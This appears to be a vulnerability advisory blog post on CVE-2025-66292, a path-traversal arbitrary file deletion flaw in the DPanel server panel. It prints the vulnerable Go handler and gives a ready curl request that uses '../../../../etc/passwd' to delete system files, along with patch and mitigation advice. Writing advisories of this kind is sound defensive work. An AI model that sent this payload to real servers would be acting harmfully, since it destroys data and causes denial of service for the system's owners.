Listen to this Post
CVE-2025-66292 is an arbitrary file deletion vulnerability found in DPanel, an open-source server management panel written in Go, affecting versions prior to 1.9.2. The flaw exists in the `/api/common/attach/delete` interface, where authenticated users can delete arbitrary files on the server. The vulnerability is rooted in the `Delete` function within app/common/http/controller/attach.go, which passes a user-submitted `path` parameter directly to `storage.Local{}.GetSaveRealPath` and subsequently to os.Remove. This process lacks proper sanitization or checks for path traversal characters like ../. The helper function in `common/service/storage/local.go` uses filepath.Join, which resolves `../` sequences but does not enforce a chroot or jail to restrict file system access. Consequently, an authenticated attacker can traverse directories and delete sensitive files outside the intended scope. The vulnerability is fixed in version 1.9.2, where proper input validation and path restriction mechanisms have been implemented. The issue was published on January 15, 2026, and has a CVSS score of 8.1, indicating high severity due to its impact on integrity and availability .
Platform: DPanel
Version: <1.9.2
Vulnerability: Arbitrary File Deletion
Severity: High
Date: 01/15/2026
Prediction: 1.9.2 (available)
What Undercode Say:
Analytics
The vulnerability is caused by the absence of path sanitization in the file deletion process. Below is the vulnerable code snippet from `attach.go` and `local.go` that leads to the arbitrary file deletion .
// Vulnerable code in app/common/http/controller/attach.go
func (c AttachController) Delete(ctx gin.Context) {
var req struct {
Path string `json:"path" binding:"required"`
}
if err := ctx.ShouldBindJSON(&req); err != nil {
ctx.JSON(400, gin.H{"error": err.Error()})
return
}
// Directly using user input to get the real path
realPath := storage.Local{}.GetSaveRealPath(req.Path)
// No check for path traversal, directly removing the file
if err := os.Remove(realPath); err != nil {
ctx.JSON(500, gin.H{"error": err.Error()})
return
}
ctx.JSON(200, gin.H{"message": "ok"})
}
// Vulnerable helper in common/service/storage/local.go
func (l Local) GetSaveRealPath(path string) string {
// filepath.Join resolves "../" but does not restrict to base directory
return filepath.Join(l.BasePath, path)
}
Exploit
An authenticated attacker can send a POST request to the vulnerable endpoint with a path traversal payload to delete arbitrary files. For example, to delete the server’s `/etc/passwd` file :
curl -X POST https://target.com/api/common/attach/delete \
-H "Content-Type: application/json" \
-H "Authorization: Bearer <valid_token>" \
-d '{"path": "../../../../etc/passwd"}'
Protection from this CVE
To mitigate this vulnerability, update DPanel to version 1.9.2 or later, where the issue is fixed . The recommended update command is:
go get github.com/donknap/[email protected]
If an immediate update is not possible, restrict access to the `/api/common/attach/delete` interface to trusted users only and implement strict input validation to block path traversal sequences .
Impact
Successful exploitation allows an authenticated attacker to delete critical system files, configuration files, or application data, leading to denial of service, data loss, or potential system compromise. The vulnerability has a CVSS score of 8.1 (High), with vector CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H, indicating network attack vector, low complexity, and high impact on integrity and availability .
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

